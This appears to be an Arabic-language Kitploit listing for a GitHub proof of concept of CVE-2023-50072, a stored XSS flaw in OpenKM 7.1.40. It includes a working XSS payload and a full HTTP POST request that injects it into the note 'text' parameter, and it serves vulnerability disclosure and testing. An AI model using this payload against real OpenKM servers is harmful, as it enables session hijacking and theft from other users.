Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-50072 — توجد ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) في OpenKM الإصدار 7.1.40. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2023-50072
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubahrixia/cve-2023-50072

CVE-2023-50072

توجد ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) في OpenKM الإصدار 7.1.40.

عرض المستودع
42منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-50072

توجد ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) في إصدار OpenKM 7.1.40 (dbb6e88) مع الإضافة الاحترافية، تسمح لمستخدم مُوثَّق برفع ملاحظة على ملف تعمل كحمولة XSS مخزنة. أي مستخدم يفتح ملاحظة ملف مستند سيؤدي إلى تشغيل XSS.

المعامل المُعرَّض للخطر: text

الاستغلال - إثبات المفهوم (POC)

عكس البرمجة النصية عبر المواقع (XSS)

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

طلب GET على [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

التأثير

يسمح XSS التخزيني للمهاجمين بحقن نصوص برمجية ضارة في تطبيق ويب، يتم تخزينها وتنفيذها عندما يشاهد مستخدمون آخرون الصفحة المتأثرة. يمكن أن يؤدي ذلك إلى سرقة معلومات حساسة، أو اختطاف الجلسات، أو توزيع برامج ضارة.

لقطة شاشة

openkm

حمولات عاملة أخرى

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
تنزيل الأداة